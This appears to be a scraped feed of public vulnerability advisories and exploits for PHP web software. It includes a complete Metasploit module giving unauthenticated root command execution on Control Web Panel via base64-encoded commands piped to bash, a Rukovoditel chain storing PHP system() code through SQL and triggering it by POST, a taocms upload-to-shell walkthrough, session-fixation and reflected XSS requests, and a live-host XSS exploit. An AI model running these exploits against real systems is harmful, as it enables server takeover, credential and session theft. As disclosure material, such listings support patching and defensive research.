Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'CWP login.php Unauthenticated RCE',        'Description' => %q{          Control Web Panel versions < 0.9.8.1147 are vulnerable to          unauthenticated OS command injection. Successful exploitation results          in code execution as the root user. The results of the command are not          contained within the HTTP response and the request will block while          the command is running.        },        'Author' => [          'Spencer McIntyre', # metasploit module          'Numan Türle' # vulnerability discovery        ],        'References' => [          [ 'CVE', '2022-44877' ],          [ 'URL', 'https://github.com/numanturle/CVE-2022-44877' ],          [ 'URL', 'https://control-webpanel.com/changelog#1674073133745-84af1b53-c121' ]        ],        'DisclosureDate' => '2023-01-05',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      Opt::RPORT(2031),      OptString.new('TARGETURI', [true, 'Base path', '/login/index.php'])    ])  end  def check    sleep_time = rand(5..10)    _, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    vprint_status("Elapsed time: #{elapsed_time} seconds")    unless elapsed_time > sleep_time      return CheckCode::Safe('Failed to test command injection.')    end    CheckCode::Appears('Successfully tested command injection.')  rescue Msf::Exploit::Failed    return CheckCode::Safe('Failed to test command injection.')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      if execute_command(payload.encoded)        print_good("Successfully executed command: #{payload.encoded}")      end    when :linux_dropper      execute_cmdstager    end  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path) + "?login=$(echo${IFS}#{Rex::Text.encode_base64(cmd)}|base64${IFS}-d|bash)",      'vars_post' => {        'username' => 'root', # *must* be root        'password' => rand_text_alphanumeric(4..16),        'commit' => 'Login'      }    )    # the command will either cause the response to timeout or return a 302    return if res.nil?    return if res.code == 302 && res.headers['Location'].include?('login=failed')    fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}")  endend

Control Web Panel Unauthenticated Remote Command Execution

PHPJabbers Business Directory Script version 3.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers  Business Directory Script 3.2                                  ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.php/URL parameter vulnerable to XSS/preview.php/[XSS]?controller=pjListings&action=pjActionAccountGET parameter 'keyword' vulnerable to XSS/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&keyword=[XSS][-] Done

PHPJabbers Business Directory Script 3.2 Cross Site Scripting

PHPJabbers Auto Classifieds Script version 3.2 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Auto Classifieds Script 3.2                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.php/URL parameter vulnerable to XSS/preview.php/[XSS]?controller=pjListings&action=pjActionSearch[-] Done

PHPJabbers Auto Classifieds Script 3.2 Cross Site Scripting

Westbrookadmin portfolioCMS v1.05 allows attackers to bypass password validation and access sensitive information via session fixation.

allows an attacker to use GETS method to request /admin page to bypass the password validation and access management page.

GET /portfolioCMS-master/admin/setup.php HTTP/1.1  
Host: 172.16.100.15  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Refere:http://172.16.100.15/portfolioCMS-master/admin/  
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; admin\_username=admin; PHPSESSID=u25c0656jai48kjhvo27kl2loq  
Upgrade-Insecure-Requests: 1

CVE-2020-20402: allows an attacker to use GETS method to request /admin page to bypass the password validation and access management page. · Issue #2 · Westbrookadmin/portfolioCMS

Rukovoditel v3.2.1 was discovered to contain a remote code execution (RCE) vulnerability in the component /rukovoditel/index.php?module=dashboard/ajax_request.

**Rukovoditel v3.2.1 has Remote Code Execution in ajax\_request.php**

Author: y1s3m0

vendors:

*   https://www.rukovoditel.net/
    
*   https://sourceforge.net/projects/rukovoditel/files/latest/download
    

**Payload**

database:rukovoditel

In the latest version of Rukovoditel, there is a remote command execution vulnerability that can be exploited simply by combining it with an SQL injection vulnerability. By executing the following command in the database, you can store the command you need. You just need to focus on "id", "type", and "configuration", and make sure that type="fieldtype\_ajax\_request" and configuration are the PHP command you want to execute.

INSERT INTO \`rukovoditel\`.\`app\_fields\`(\`id\`, \`entities\_id\`, \`forms\_tabs\_id\`, \`comments\_forms\_tabs\_id\`, \`forms\_rows\_position\`, \`type\`, \`name\`, \`short\_name\`, \`is\_heading\`, \`tooltip\`, \`tooltip\_display\_as\`, \`tooltip\_in\_item\_page\`, \`tooltip\_item\_page\`, \`notes\`, \`is\_required\`, \`required\_message\`, \`configuration\`, \`sort\_order\`, \`listing\_status\`, \`listing\_sort\_order\`, \`comments\_status\`, \`comments\_sort\_order\`) VALUES (999, 23, 28, 0, '', 'fieldtype\_ajax\_request', 'Subject', '', 1, '', '', 0, '', '', 1, '', '{\\"php\_code\\":\\"system(\\\\"whoami\\\\")\\"}', 3, 1, 3, 0, 0);

Then, by obtaining the administrator's "form\_session\_token" and cookie, you can construct a payload similar to the one below and execute the command stored in the database. Make sure that field\_id is the injected id above.

POST /index.php?module\=dashboard/ajax\_request&field\_id\=999 HTTP/1.1
Host: rukovoditel:8082
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,ja;q=0.8,vi;q=0.7
Content-Length: 35
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: cookie\_test=please\_accept\_for\_session; sid=ecvuqrogd8e5v7jvlqr2mvhj5c; app\_remember\_me=1; app\_stay\_logged=1; app\_remember\_user=YWRtaW4%3D; app\_remember\_pass=JFAkRTRVRnlFMHhGQzYxMlFqWE5KUHJxLzJHck9oUGVTMA%3D%3D; XDEBUG\_SESSION=XDEBUG\_ECLIPSE
DNT: 1
Origin: http://rukovoditel:8082
Referer: http://rukovoditel:8082/index.php?module=custom\_php/code
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
form\_session\_token=ih7agGdyZZ

CVE-2022-48175: vulnfind/rce_ajax_request.md at main · y1s3m0/vulnfind

An arbitrary file upload vulnerability in taocms v3.0.2 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is exploited via manipulation of the upext variable at /include/Model/Upload.php.

This is the latest 3.0.2 version of taocms.

Organize and utilize steps in two steps：

Step1：  
Audit the source code "include/Model/Upload.php", line 33, the filename extension can be controlled by modifying variable "upext":  

Follow up in "include/Model/File.php", line 75, there is a $this->realpath and find that it comes from $this->path, and $this->path can be passed in through the get parameter (where SYS\_ROOT is the root directory of the website):  

Here any changes to the variable "upext" or file "Upload.php" can be saved by the method "save" which locates at "include/Model/File.php", line 73:  

At this stage, you can add "php" filename extension to the variable "upext" and click "save" to save it:  

Step 2:  
Next, you can upload any php file to the system:  

New a.php file is successfully uploaded:  

Once you uploaded file, you can open the file through the path "http://www.taocms.com:9090/a.php", and you can get shell of this system:

CVE-2022-48006: File upload vulnerability exists by modifying Upload.php configuration in backend. · Issue #35 · taogogo/taocms

The Membership For WooCommerce WordPress plugin before 2.1.7 does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.

CVE-2022-4395

The Revive Old Posts WordPress plugin before 9.0.11 unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

CVE-2022-4680

PHPJabbers Car Park Booking System version 2.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : PHPJabbers.com                                                             ││  Vendor   : PHPJabbers                                                                 ││  Software : PHPJabbers Car Park Booking System 2.0 - Reflected XSS                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'index' is vulnerable to XSS/index.php?controller=pjFront&action=pjActionSearch&session_id=c6e6onmv599a10vr76oei88jh2&theme=1&locale=1&hide=0&index=[XSS][-] Done

PHPJabbers Car Park Booking System 2.0 Cross Site Scripting

Zstore version 6.6.0 suffers from a cross site scripting vulnerability.

    ## Title: zstore-6.6.0 - XSS-Reflected## Development: nu11secur1ty## Date: 01.29.2023## Vendor: https://zippy.com.ua/## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4## Description:The value of manual insertion `point 1` is copied into the HTMLdocument as plain text between tags.The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted inthe manual insertion point 1.This input was echoed unmodified in the application's response.## STATUS: HIGH Vulnerability[+] Exploit:```GETGET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0aHTTP/2Host: store.zippy.com.uaCookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://store.zippy.com.ua/index.php?q=p:App/Pages/MainAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9```[+] Response:```HTTP/2 200 OKServer: nginxDate: Sun, 29 Jan 2023 07:27:55 GMTContent-Type: text/html; charset=UTF-8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheX-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546Class \App\Pages\Chatgiflc<ahref="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><imgsrc=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>```## Proof and Exploit:[href](https://streamable.com/aadj5c)## Reference:[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)

Tag

#php